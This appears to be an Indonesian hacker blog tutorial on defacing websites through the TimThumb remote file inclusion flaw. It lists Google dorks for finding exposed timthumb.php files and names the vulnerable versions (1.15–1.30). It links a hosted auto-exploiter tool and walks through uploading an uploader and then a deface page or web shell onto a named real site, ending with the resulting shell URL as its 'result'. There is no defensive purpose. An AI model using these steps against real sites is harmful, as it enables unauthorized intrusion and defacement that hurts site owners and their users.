Tutorial Deface metode Timthumb RFI


 



Halo Ngab , Balik lagi dengan gw Arman1337, Kali ini gw akan Nge-share tutorial deface metode Timthumb RFI


Pertama-tama kita siapkan bahan-bahan nya dulu:v


Bahan ;


-Dork = 

"Administractor" inurl:/admin site:.com

"Administractor" inurl:/admin site:.vn

inurl:/admin/timthumb.php

inurl:/timthumb.php


-exploit =

/admin/timthumb.php

/timthumb.php


-sc depes kalian


-Tools Auto Exploiter Timthumb

 http://inasnacc.org/ojs2/public/site/images/oyons/tools/timthumb


-Kuota Internet


Ok gw rasa udh cukup sekarang kita ke tutorial nya:v


Pertama2 kalian ngedorking dulu di google



 

cari web vuln , lalu tambahkan Exploit admin/timthumb.php seperti ini


http://hte-jsc.com/admin/timthumb.php





Ciri - Ciri Vuln?

akan ada seperti ini


no image specified

Query String : 

TimThumb version : 1.19


Dia Vuln nya versi 1.15-1.30:v


Kalau udh langsung aja kita buka tools auto exploiter timthumb nya


Salin site beserta Exploit nya lalu paste di tools nya , seperti ini ;




Lalu Klik Exploit


Dan dia akan seperti ini ;




Cara manggil nya? , Salin semua tulisan yang ada di belakang public_html lalu paste di site nya



Berhasil up uploader nya, tinggal mau up SC or Shell, di sini gw cuma up file aja:v




Pilih file dan upload





Sucsess, Cara panggil nya? Klik tulisan yg Klik Di Sini:v




Done:v


My Result?

http://hte-jsc.com/admin/webroot/cache/ft.php


Oke sekian materi dari gw kurang lebih nya minta maaf:v


Gw akhiri assalamualaikum warahmatullahi wa barakatuh


#Thanks To All My Friends